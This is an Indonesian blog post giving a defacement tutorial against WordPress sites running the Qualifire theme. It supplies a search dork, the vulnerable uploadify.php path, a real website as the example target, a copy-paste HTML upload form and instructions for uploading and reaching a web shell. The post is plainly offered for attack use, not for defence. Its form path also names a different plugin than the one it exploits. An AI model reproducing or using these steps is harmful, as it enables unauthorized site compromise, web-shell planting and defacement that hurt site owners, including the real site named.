Tutorial Deface Wordpress Themes Qualifire File Upload

Tutorial Deface Wordpress Themes Qualifire File Upload

00.38


Halo kawan...
Assalamualaikum.. ^_^

Ini blog pertama kami (Cileungsi Security)
Sekarang saya akan membagikan Tutorial Deface dengan Wordpress Themes Qualifire File Upload..
Langsung ke TKP aja...

Dork : inurl:"/wp-content/themes/qualifire" (Use Your Brain) ^_^
Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Vuln? Biasanya blank.. Kalo gak vuln "Page Not Found" or "404" gitu dah..

Example : http://orlandoconsolerepair.com/wp-content/themes/qualifire/
Ganti yang berwarna hijau dengan Exploit tadi..

Jadi : http://orlandoconsolerepair.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Copy paste Script CSRF :
<form
action="http:///site.com/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>

Lalu simpan dengan file CSRF.htm or .html
Ubah link target dengan target kalian sendiri...

Lalu upload shell.. 
Jika sukses akan ada angka "1" dan Jika tidak "Invalid File Type"

Cara melihat shell : http://target.com/namashell.php

Selesai..
Good Luck ~_^

~ Arief Dot ID ~

Related Posts

Silahkan Komentarnya !!

Ketentuan Berkomentar :
1. Berkomentarlah Dengan Baik Dan Sopan
2. Tidak Punya Akun Beri Komentar Sebagai : Anonymous
3. Dilarang Meletakkan Link Hidup Maupun Link Mati
EmoticonEmoticon

:)
:(
=(
^_^
:D
=D
=)D
|o|
@@,
;)
:-bd
:-d
:p
:ng
:lv
Langganan: Posting Komentar (Atom)